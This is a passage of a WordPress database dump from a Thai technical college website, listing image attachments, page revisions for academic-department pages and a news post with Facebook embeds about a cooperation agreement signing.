(1829, 3, '2018-03-14 13:42:34', '2018-03-14 06:42:34', '', '14-3-2561 13-23-43', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-23-43', '', '', '2018-03-14 13:42:34', '2018-03-14 06:42:34', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg', 0, 'attachment', 'image/jpeg', 0),
(1830, 3, '2018-03-14 13:42:55', '2018-03-14 06:42:55', '', '14-3-2561 13-27-29', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-27-29', '', '', '2018-03-14 13:42:55', '2018-03-14 06:42:55', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(1831, 3, '2018-03-14 13:42:58', '2018-03-14 06:42:58', '', '14-3-2561 13-25-14', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-25-14', '', '', '2018-03-14 13:42:58', '2018-03-14 06:42:58', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-25-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(1832, 3, '2018-03-14 13:43:03', '2018-03-14 06:43:03', '', '14-3-2561 13-34-37', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-34-37', '', '', '2018-03-14 13:43:03', '2018-03-14 06:43:03', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg', 0, 'attachment', 'image/jpeg', 0),
(1833, 3, '2018-03-14 13:43:07', '2018-03-14 06:43:07', '', '14-3-2561 13-38-35', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-38-35', '', '', '2018-03-14 13:43:07', '2018-03-14 06:43:07', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(1834, 3, '2018-03-14 13:43:10', '2018-03-14 06:43:10', '', '14-3-2561 13-35-45', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-35-45', '', '', '2018-03-14 13:43:10', '2018-03-14 06:43:10', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-35-45.jpg', 0, 'attachment', 'image/jpeg', 0),
(1835, 3, '2018-03-14 13:43:13', '2018-03-14 06:43:13', '', '14-3-2561 13-40-22', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-40-22', '', '', '2018-03-14 13:43:13', '2018-03-14 06:43:13', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(1836, 3, '2018-03-14 13:49:52', '2018-03-14 06:49:52', '<img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1820\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-13-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1824\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1825\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-28-10-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1826 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg\" alt=\"\" width=\"394\" height=\"316\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1827\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1828\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-44-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1829 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg\" alt=\"\" width=\"586\" height=\"624\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1830\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1831\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-25-14-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1832 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg\" alt=\"\" width=\"433\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1833\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1834\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-35-45-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1835 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg\" alt=\"\" width=\"256\" height=\"321\" />', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-autosave-v1', '', '', '2018-03-14 13:49:52', '2018-03-14 06:49:52', '', 656, 'http://www.technicrayong.ac.th/656-autosave-v1/', 0, 'revision', '', 0),
(1837, 3, '2018-03-14 13:49:43', '2018-03-14 06:49:43', '<img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1820\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-13-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1824\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1825\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-28-10-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1826 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg\" alt=\"\" width=\"394\" height=\"316\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1827\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1828\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-44-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1829 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg\" alt=\"\" width=\"586\" height=\"624\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1830\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1831\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-25-14-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1832 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg\" alt=\"\" width=\"433\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1833\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1834\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-35-45-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1835 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg\" alt=\"\" width=\"256\" height=\"321\" />', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-03-14 13:49:43', '2018-03-14 06:49:43', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(1838, 3, '2018-03-14 14:00:57', '2018-03-14 07:00:57', '<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />', 'งานพัฒนาหลักสูตรการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5', '', '', '2018-03-14 14:00:57', '2018-03-14 07:00:57', '', 0, 'http://www.technicrayong.ac.th/?page_id=1838', 0, 'page', '', 0),
(1839, 3, '2018-03-14 14:00:57', '2018-03-14 07:00:57', '<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />', 'งานพัฒนาหลักสูตรการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1838-revision-v1', '', '', '2018-03-14 14:00:57', '2018-03-14 07:00:57', '', 1838, 'http://www.technicrayong.ac.th/1838-revision-v1/', 0, 'revision', '', 0),
(1840, 3, '2018-03-14 14:02:08', '2018-03-14 07:02:08', '<img class=\"aligncenter size-full wp-image-1824\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1825\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-28-10-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1826 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg\" alt=\"\" width=\"394\" height=\"316\" />', 'งานวัดผลและประเมินผล', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9c%e0%b8%a5%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%9c%e0%b8%a5', '', '', '2018-03-14 14:02:08', '2018-03-14 07:02:08', '', 0, 'http://www.technicrayong.ac.th/?page_id=1840', 0, 'page', '', 0),
(1841, 3, '2018-03-14 14:02:08', '2018-03-14 07:02:08', '<img class=\"aligncenter size-full wp-image-1824\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1825\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-28-10-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1826 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg\" alt=\"\" width=\"394\" height=\"316\" />', 'งานวัดผลและประเมินผล', '', 'inherit', 'closed', 'closed', '', '1840-revision-v1', '', '', '2018-03-14 14:02:08', '2018-03-14 07:02:08', '', 1840, 'http://www.technicrayong.ac.th/1840-revision-v1/', 0, 'revision', '', 0),
(1842, 3, '2018-03-14 14:03:14', '2018-03-14 07:03:14', '<img class=\"aligncenter size-full wp-image-1827\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1828\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-44-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1829 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg\" alt=\"\" width=\"586\" height=\"624\" />', 'งานวิทยบริการและห้องสมุด', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%a1', '', '', '2018-03-14 14:03:14', '2018-03-14 07:03:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=1842', 0, 'page', '', 0),
(1843, 3, '2018-03-14 14:03:14', '2018-03-14 07:03:14', '<img class=\"aligncenter size-full wp-image-1827\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1828\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-44-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1829 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg\" alt=\"\" width=\"586\" height=\"624\" />', 'งานวิทยบริการและห้องสมุด', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2018-03-14 14:03:14', '2018-03-14 07:03:14', '', 1842, 'http://www.technicrayong.ac.th/1842-revision-v1/', 0, 'revision', '', 0),
(1844, 3, '2018-03-14 14:05:20', '2018-03-14 07:05:20', '<img class=\"aligncenter size-full wp-image-1830\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1831\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-25-14-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1832 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg\" alt=\"\" width=\"433\" height=\"312\" />', 'งานอาชีวศึกษาระบบทวิภาคี', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%97%e0%b8%a7%e0%b8%b4%e0%b8%a0%e0%b8%b2', '', '', '2018-03-14 14:05:20', '2018-03-14 07:05:20', '', 0, 'http://www.technicrayong.ac.th/?page_id=1844', 0, 'page', '', 0),
(1845, 3, '2018-03-14 14:05:20', '2018-03-14 07:05:20', '<img class=\"aligncenter size-full wp-image-1830\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1831\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-25-14-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1832 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg\" alt=\"\" width=\"433\" height=\"312\" />', 'งานอาชีวศึกษาระบบทวิภาคี', '', 'inherit', 'closed', 'closed', '', '1844-revision-v1', '', '', '2018-03-14 14:05:20', '2018-03-14 07:05:20', '', 1844, 'http://www.technicrayong.ac.th/1844-revision-v1/', 0, 'revision', '', 0),
(1846, 3, '2018-03-14 14:08:46', '2018-03-14 07:08:46', '<img class=\"aligncenter size-full wp-image-1833\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1834\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-35-45-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1835 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg\" alt=\"\" width=\"256\" height=\"321\" />', 'งานสื่อการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%99', '', '', '2018-03-14 14:09:03', '2018-03-14 07:09:03', '', 0, 'http://www.technicrayong.ac.th/?page_id=1846', 0, 'page', '', 0),
(1847, 3, '2018-03-14 14:08:46', '2018-03-14 07:08:46', '<img class=\"aligncenter size-full wp-image-1833\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1834\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-35-45-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1835 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg\" alt=\"\" width=\"256\" height=\"321\" />', 'งานสื่อการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1846-revision-v1', '', '', '2018-03-14 14:08:46', '2018-03-14 07:08:46', '', 1846, 'http://www.technicrayong.ac.th/1846-revision-v1/', 0, 'revision', '', 0),
(1848, 3, '2018-03-15 15:17:26', '2018-03-15 08:17:26', '<a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c/1-16/\"><img class=\"alignnone size-full wp-image-11887\" src=\"/wp-content/uploads/2021/06/1-4.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c/2-12/\"><img class=\"alignnone size-full wp-image-11888\" src=\"/wp-content/uploads/2021/06/2-3.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c/3-8/\"><img class=\"alignnone size-full wp-image-11889\" src=\"/wp-content/uploads/2021/06/3-1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ช่างยนต์', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c', '', '', '2021-06-28 14:22:47', '2021-06-28 07:22:47', '', 0, 'http://www.technicrayong.ac.th/?page_id=1848', 0, 'page', '', 0),
(1850, 1, '2018-03-14 16:26:20', '2018-03-14 09:26:20', '', 'Facebook', '', 'publish', 'closed', 'closed', '', 'facebook', '', '', '2018-03-14 16:26:20', '2018-03-14 09:26:20', '', 0, 'http://www.technicrayong.ac.th/?p=1850', 2, 'nav_menu_item', '', 0),
(1851, 3, '2018-03-15 09:11:33', '2018-03-15 02:11:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง ในวันพุธที่ 14 มีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%a5%e0%b8%87%e0%b8%99%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-mou-%e0%b9%80', '', '', '2018-03-15 14:43:36', '2018-03-15 07:43:36', '', 0, 'http://www.technicrayong.ac.th/?p=1851', 445, 'post', '', 0),
(1852, 3, '2018-03-15 09:09:18', '2018-03-15 02:09:18', '', '29176888_555862101456649_7016365966107869184_o', '', 'inherit', 'closed', 'closed', '', '29176888_555862101456649_7016365966107869184_o', '', '', '2018-03-15 09:09:18', '2018-03-15 02:09:18', '', 1851, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29176888_555862101456649_7016365966107869184_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1853, 3, '2018-03-15 09:11:33', '2018-03-15 02:11:33', '<img class=\"aligncenter wp-image-1852 size-full\" src=\"/wp-content/uploads/2018/03/29176888_555862101456649_7016365966107869184_o.jpg\" alt=\"\" width=\"1728\" height=\"1152\" />\r\n\r\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\"></iframe>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:11:33', '2018-03-15 02:11:33', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1854, 3, '2018-03-15 09:30:39', '2018-03-15 02:30:39', '<iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-autosave-v1', '', '', '2018-03-15 09:30:39', '2018-03-15 02:30:39', '', 1851, 'http://www.technicrayong.ac.th/1851-autosave-v1/', 0, 'revision', '', 0),
(1855, 3, '2018-03-15 09:14:39', '2018-03-15 02:14:39', '<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\"></iframe>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:14:39', '2018-03-15 02:14:39', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1856, 3, '2018-03-15 09:16:53', '2018-03-15 02:16:53', '', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:16:53', '2018-03-15 02:16:53', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1857, 3, '2018-03-15 09:23:41', '2018-03-15 02:23:41', '<img class=\"aligncenter wp-image-1852 size-full\" src=\"/wp-content/uploads/2018/03/29176888_555862101456649_7016365966107869184_o.jpg\" alt=\"\" width=\"1728\" height=\"1152\" />\r\n\r\n ', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:23:41', '2018-03-15 02:23:41', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1858, 3, '2018-03-15 09:27:51', '2018-03-15 02:27:51', '<iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:27:51', '2018-03-15 02:27:51', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1859, 3, '2018-03-15 09:31:42', '2018-03-15 02:31:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง', '', 